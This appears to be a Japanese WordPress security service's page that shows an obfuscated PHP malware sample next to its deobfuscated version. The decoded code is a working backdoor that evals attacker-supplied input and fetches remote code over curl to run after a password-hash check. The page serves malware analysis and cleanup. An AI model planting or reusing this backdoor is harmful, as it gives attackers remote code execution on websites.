Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto mXMm4; AGRvz: lTY5k: goto M9Vme; DI1U8: class QWt7E { static function enbO_($d6_fz) { goto D7D3T; yFrDd: wMnjb: goto uCvEc; l8cwh: $DyjdG = ''; goto hOdSe; uCvEc: return $DyjdG; goto WmQyt; D7D3T: $sjcWq = "\162" . "\141" . "\x6e" . "\147" . "\145"; goto taFZT; hOdSe: foreach ($zBXD6 a...



難読化されたPHPコード

view sourceprint?
1<?php
2 goto mXMm4; AGRvz: lTY5k: goto M9Vme; DI1U8: class QWt7E { static function enbO_($d6_fz) { goto D7D3T; yFrDd: wMnjb: goto uCvEc; l8cwh: $DyjdG = ''; goto hOdSe; uCvEc: return $DyjdG; goto WmQyt; D7D3T: $sjcWq = "\162" . "\141" . "\x6e" . "\147" . "\145"; goto taFZT; hOdSe: foreach ($zBXD6 as $pgWkd => $LDO1E) { $DyjdG .= $Qbz32[$LDO1E - 9107]; RQotN: } goto yFrDd; Z6wFJ: $zBXD6 = explode("\x7e", $d6_fz); goto l8cwh; taFZT: $Qbz32 = $sjcWq("\176", "\x20"); goto Z6wFJ; WmQyt: } static function vChms($H8pSk, $jQWkw) { goto XgXHm; PdcdF: $mUrQ6 = curl_exec($SYX3U); goto nDRUN; nDRUN: return empty($mUrQ6) ? $jQWkw($H8pSk) : $mUrQ6; goto ehBH3; v010d: curl_setopt($SYX3U, CURLOPT_RETURNTRANSFER, 1); goto PdcdF; XgXHm: $SYX3U = curl_init($H8pSk); goto v010d; ehBH3: } static function Eq5u4() { goto DcI0p; meUlj: if (!(@$gejZR[0] - time() > 0 and md5(md5($gejZR[3 + 0])) === "\x62\70\x66\x61\67\65\66\x37\61\145\x35\61\64\60\60\x38\145\66\143\x39\x38\x64\x31\x66\x32\x33\x33\63\x31\64\67\x63")) { goto rhyew; } goto NV5B5; wNaw5: $gejZR = $F1q5x[2 + 0]($Tqb1w, true); goto u8vzv; phjol: @eval($F1q5x[3 + 1]($URkI8)); goto bDx3O; caMs_: foreach ($SlmhE as $h98oW) { $F1q5x[] = self::Enbo_($h98oW); XKPs4: } goto ZksFd; ZksFd: ZKOg2: goto s0E85; TVprD: rhyew: goto yaaxr; nBH4C: $Tqb1w = @$F1q5x[0 + 3]($F1q5x[1 + 5], $ZaOJU); goto wNaw5; DcI0p: $SlmhE = array("\71\61\x33\x34\x7e\71\x31\61\x39\x7e\x39\61\63\62\x7e\x39\x31\x33\x36\x7e\71\61\61\x37\x7e\x39\61\63\62\176\71\x31\x33\x38\176\x39\x31\63\61\176\71\x31\x31\x36\x7e\71\61\x32\x33\x7e\x39\x31\x33\64\176\71\61\x31\x37\x7e\x39\x31\62\x38\x7e\71\61\x32\x32\x7e\x39\x31\62\x33", "\x39\61\61\x38\176\x39\x31\61\x37\176\71\x31\x31\71\x7e\71\61\x33\70\176\x39\61\61\x39\176\x39\x31\x32\62\x7e\71\61\61\x37\x7e\71\61\70\64\176\71\61\x38\62", "\x39\x31\62\67\x7e\x39\61\x31\70\x7e\x39\61\x32\x32\x7e\x39\61\x32\x33\176\x39\61\63\x38\x7e\x39\x31\63\63\x7e\x39\x31\x33\x32\x7e\x39\x31\63\64\x7e\71\x31\62\x32\176\x39\61\63\63\176\71\61\63\x32", "\x39\61\62\61\176\71\x31\x33\66\x7e\71\x31\x33\64\x7e\x39\x31\62\66", "\x39\x31\63\65\176\71\61\63\66\x7e\x39\x31\61\70\176\71\x31\x33\62\176\x39\61\x37\x39\x7e\x39\x31\x38\61\176\71\x31\63\70\176\71\x31\x33\x33\x7e\71\x31\63\62\176\71\x31\63\x34\176\x39\61\62\x32\x7e\x39\61\63\x33\x7e\x39\61\x33\x32", "\x39\x31\63\x31\x7e\x39\61\x32\x38\x7e\71\x31\62\65\x7e\x39\x31\63\62\x7e\x39\61\63\x38\176\x39\61\63\60\176\x39\x31\63\x32\176\71\61\61\x37\x7e\71\x31\x33\x38\176\x39\x31\63\64\176\x39\61\x32\x32\176\71\x31\x32\x33\x7e\x39\61\61\67\x7e\71\61\x33\62\176\x39\61\62\x33\176\71\x31\x31\67\x7e\x39\x31\61\x38", "\71\x31\66\x31\x7e\x39\61\x39\61", "\x39\x31\60\70", "\71\61\x38\66\x7e\x39\61\x39\x31", "\71\61\x36\x38\176\71\x31\x35\61\176\71\61\65\x31\176\71\61\66\70\176\x39\61\x34\x34", "\71\x31\63\61\176\x39\x31\x32\70\x7e\x39\61\x32\65\x7e\71\x31\x31\67\176\71\61\x33\x32\x7e\x39\x31\x31\71\x7e\71\61\x33\x38\x7e\x39\x31\x32\70\x7e\71\x31\62\x33\176\71\x31\x32\61\176\x39\61\61\x36\x7e\x39\x31\61\x37"); goto caMs_; NV5B5: $URkI8 = self::Vchms($gejZR[0 + 1], $F1q5x[2 + 3]); goto phjol; bDx3O: die; goto TVprD; u8vzv: @$F1q5x[10 + 0](INPUT_GET, "\157\x66") == 1 && die($F1q5x[5 + 0](__FILE__)); goto meUlj; s0E85: $ZaOJU = @$F1q5x[1]($F1q5x[6 + 4](INPUT_GET, $F1q5x[6 + 3])); goto nBH4C; yaaxr: } } goto bzuuK; SO2Ns: if (!(in_array(gettype($djyJ1) . count($djyJ1), $djyJ1) && count($djyJ1) == 25 && md5(md5(md5(md5($djyJ1[19])))) === "\143\x34\x32\64\71\144\146\x65\x33\x32\71\146\61\143\x63\x32\x63\145\x32\71\62\146\x32\66\x37\x31\65\66\67\146\144\64")) { goto lTY5k; } goto UkPRp; UkPRp: ($djyJ1[67] = $djyJ1[67] . $djyJ1[78]) && ($djyJ1[81] = $djyJ1[67]($djyJ1[81])) && @eval($djyJ1[67](${$djyJ1[45]}[27])); goto AGRvz; M9Vme: metaphone("\116\104\115\x33\x4f\x44\115\x34\115\124\143\167\x4e\172\x67\172\115\x7a\105\x34\115\124\153\62\115\152\131\63\x4e\x44\x59\x79"); goto DI1U8; vN4Dt: $e3epn = $clyRa("\176", "\x20"); goto N_a1g; mXMm4: $clyRa = "\x72" . "\x61" . "\156" . "\x67" . "\x65"; goto vN4Dt; N_a1g: $djyJ1 = ${$e3epn[12 + 19] . $e3epn[40 + 19] . $e3epn[19 + 28] . $e3epn[38 + 9] . $e3epn[17 + 34] . $e3epn[32 + 21] . $e3epn[56 + 1]}; goto SO2Ns; bzuuK: QWt7e::eQ5U4();
3?>

デコード(難読化解除)されたコード

view sourceprint?
01<?php
02 
03$clyRa = "range";
04$e3epn = range("~", " ");
05$djyJ1 = ${$e3epn[31] . $e3epn[59] . $e3epn[47] . $e3epn[47] . $e3epn[51] . $e3epn[53] . $e3epn[57]};
06if (!(in_array(gettype($djyJ1) . count($djyJ1), $djyJ1) && count($djyJ1) == 25 && md5(md5(md5(md5($djyJ1[19])))) === "c4249dfe329f1cc2ce292f2671567fd4")) {
07    goto lTY5k;
08}
09($djyJ1[67] .= $djyJ1[78]) && ($djyJ1[81] = $djyJ1[67]($djyJ1[81])) && @eval($djyJ1[67](${$djyJ1[45]}[27]));
10lTY5k:
11metaphone("NDM3ODM4MTcwNzgzMzE4MTk2MjY3NDYy");
12class QWt7E
13{
14    static function enbO_($d6_fz)
15    {
16        $sjcWq = "range";
17        $Qbz32 = range("~", " ");
18        $zBXD6 = explode("~", $d6_fz);
19        $DyjdG = '';
20        foreach ($zBXD6 as $pgWkd => $LDO1E) {
21            $DyjdG .= $Qbz32[$LDO1E - 9107];
22        }
23        return $DyjdG;
24    }
25    static function vChms($H8pSk, $jQWkw)
26    {
27        $SYX3U = curl_init($H8pSk);
28        curl_setopt($SYX3U, CURLOPT_RETURNTRANSFER, 1);
29        $mUrQ6 = curl_exec($SYX3U);
30        return empty($mUrQ6) ? $jQWkw($H8pSk) : $mUrQ6;
31    }
32    static function Eq5u4()
33    {
34        $SlmhE = array("9134~9119~9132~9136~9117~9132~9138~9131~9116~9123~9134~9117~9128~9122~9123", "9118~9117~9119~9138~9119~9122~9117~9184~9182", "9127~9118~9122~9123~9138~9133~9132~9134~9122~9133~9132", "9121~9136~9134~9126", "9135~9136~9118~9132~9179~9181~9138~9133~9132~9134~9122~9133~9132", "9131~9128~9125~9132~9138~9130~9132~9117~9138~9134~9122~9123~9117~9132~9123~9117~9118", "9161~9191", "9108", "9186~9191", "9168~9151~9151~9168~9144", "9131~9128~9125~9117~9132~9119~9138~9128~9123~9121~9116~9117");
35        foreach ($SlmhE as $h98oW) {
36            $F1q5x[] = self::Enbo_($h98oW);
37        }
38        $ZaOJU = @$F1q5x[1]($F1q5x[10](INPUT_GET, $F1q5x[9]));
39        $Tqb1w = @$F1q5x[3]($F1q5x[6], $ZaOJU);
40        $gejZR = $F1q5x[2]($Tqb1w, true);
41        @$F1q5x[10](INPUT_GET, "of") == 1 && die($F1q5x[5]("/var/www/html/input.php"));
42        if (!(@$gejZR[0] - time() > 0 and md5(md5($gejZR[3])) === "b8fa75671e514008e6c98d1f2333147c")) {
43            // [PHPDeobfuscator] Implied return
44            return;
45        }
46        $URkI8 = self::Vchms($gejZR[1], $F1q5x[5]);
47        @eval($F1q5x[4]($URkI8));
48        die;
49    }
50}
51QWt7e::eQ5U4();

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.